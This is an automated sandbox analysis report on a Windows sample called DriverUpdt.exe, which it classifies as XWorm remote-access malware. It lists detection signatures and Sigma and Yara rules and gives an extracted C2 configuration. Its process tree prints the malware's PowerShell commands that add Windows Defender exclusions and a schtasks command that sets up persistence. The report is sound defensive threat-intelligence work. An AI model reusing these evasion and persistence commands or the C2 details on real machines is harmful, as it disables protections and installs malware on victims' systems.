Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DriverUpdt.exe

Overview

General Information

Sample name:DriverUpdt.exe
Analysis ID:1465719
MD5:65485b0475b6c8a3b4f35bba541938a6
SHA1:28e6e6cd2ebf8a9fdffeb4aeba13b70ea7ea03a3
SHA256:c6740ee5c8afdc2c7be42fb03ab5a346925efc6ac785fe7d68dec2d5f05d276b
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DriverUpdt.exe (PID: 5520 cmdline: "C:\Users\user\Desktop\DriverUpdt.exe" MD5: 65485B0475B6C8A3B4F35BBA541938A6)
    • powershell.exe (PID: 7084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6172 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • DriverUpdt (PID: 3008 cmdline: C:\Users\user\AppData\Roaming\DriverUpdt MD5: 65485B0475B6C8A3B4F35BBA541938A6)
  • OpenWith.exe (PID: 4712 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 4676 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 5856 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • DriverUpdt (PID: 4768 cmdline: C:\Users\user\AppData\Roaming\DriverUpdt MD5: 65485B0475B6C8A3B4F35BBA541938A6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["stewiegriffin-37537.portmap.host"], "Port": "37537", "Aes key": "37537", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
DriverUpdt.exeJoeSecurity_XWormYara detected XWormJoe Security
    DriverUpdt.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      DriverUpdt.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xf809:$s6: VirtualBox
      • 0xf767:$s8: Win32_ComputerSystem
      • 0x13526:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x135c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x136d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x123b2:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\DriverUpdtJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\DriverUpdtJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\DriverUpdtMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xf809:$s6: VirtualBox
          • 0xf767:$s8: Win32_ComputerSystem
          • 0x13526:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x135c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x136d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x123b2:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x10281:$s6: VirtualBox
            • 0x101df:$s8: Win32_ComputerSystem
            • 0x13f9e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x1403b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x14150:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x12e2a:$cnc4: POST / HTTP/1.1
            00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xf609:$s6: VirtualBox
              • 0xf567:$s8: Win32_ComputerSystem
              • 0x13326:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x133c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x134d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x121b2:$cnc4: POST / HTTP/1.1
              00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.DriverUpdt.exe.df0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.DriverUpdt.exe.df0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.DriverUpdt.exe.df0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xf809:$s6: VirtualBox
                    • 0xf767:$s8: Win32_ComputerSystem
                    • 0x13526:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x135c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x136d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x123b2:$cnc4: POST / HTTP/1.1
                    0.2.DriverUpdt.exe.12ff1a78.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      0.2.DriverUpdt.exe.12ff1a78.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xda09:$s6: VirtualBox
                      • 0xd967:$s8: Win32_ComputerSystem
                      • 0x11726:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x117c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x118d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x105b2:$cnc4: POST / HTTP/1.1
                      Click to see the 3 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', ProcessId: 7084, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', ProcessId: 7084, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\DriverUpdt, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DriverUpdt.exe, ProcessId: 5520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdt
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\DriverUpdt, CommandLine: C:\Users\user\AppData\Roaming\DriverUpdt, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\DriverUpdt, NewProcessName: C:\Users\user\AppData\Roaming\DriverUpdt, OriginalFileName: C:\Users\user\AppData\Roaming\DriverUpdt, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\DriverUpdt, ProcessId: 3008, ProcessName: DriverUpdt
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', ProcessId: 7084, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\DriverUpdt.exe, ProcessId: 5520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUpdt.lnk
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt", ProcessId: 6172, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', ProcessId: 7084, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4676, ProcessName: svchost.exe

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: DriverUpdt.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: stewiegriffin-37537.portmap.hostAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtAvira: detection malicious, Label: TR/Spy.Gen
                      Found malware configuration
                      Source: DriverUpdt.exeMalware Configuration Extractor: Xworm {"C2 url": ["stewiegriffin-37537.portmap.host"], "Port": "37537", "Aes key": "37537", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtReversingLabs: Detection: 84%
                      Multi AV Scanner detection for submitted file
                      Source: DriverUpdt.exeReversingLabs: Detection: 84%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: DriverUpdt.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: DriverUpdt.exeString decryptor: stewiegriffin-37537.portmap.host
                      Source: DriverUpdt.exeString decryptor: 37537
                      Source: DriverUpdt.exeString decryptor: catfart
                      Source: DriverUpdt.exeString decryptor: <Xwormmm>
                      Source: DriverUpdt.exeString decryptor: gurry
                      Source: DriverUpdt.exeString decryptor: USB.exe
                      Source: DriverUpdt.exeString decryptor: %AppData%
                      Source: DriverUpdt.exeString decryptor: DriverUpdt
                      Source: DriverUpdt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: DriverUpdt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: stewiegriffin-37537.portmap.host
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: DriverUpdt.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.5:49714 -> 193.161.193.99:37537
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 193.161.193.99 193.161.193.99
                      Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                      Source: Joe Sandbox ViewASN Name: BITREE-ASRU BITREE-ASRU
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: stewiegriffin-37537.portmap.host
                      Source: powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                      Source: powershell.exe, 00000005.00000002.2227719144.00000135E1DF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                      Source: powershell.exe, 00000005.00000002.2227719144.00000135E1DF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                      Source: powershell.exe, 00000005.00000002.2225891671.00000135E1C30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                      Source: powershell.exe, 0000000A.00000002.2583865294.0000014E38E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsp
                      Source: svchost.exe, 00000012.00000002.3276702426.000001BA75A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: qmgr.db.18.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: DriverUpdt.exe, DriverUpdt.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000002.00000002.2119512647.0000029C6C39F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2209288191.00000135D96FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359742614.0000019A7675F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2102983893.0000029C5C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C98B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A66AA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: DriverUpdt.exe, 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2102983893.0000029C5C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C9691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A666F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E20711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.2102983893.0000029C5C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C98B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A66AA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000008.00000002.2385082051.0000019A7EEF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                      Source: powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoom/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl0l
                      Source: powershell.exe, 00000002.00000002.2102983893.0000029C5C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C9691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A666F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E20711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
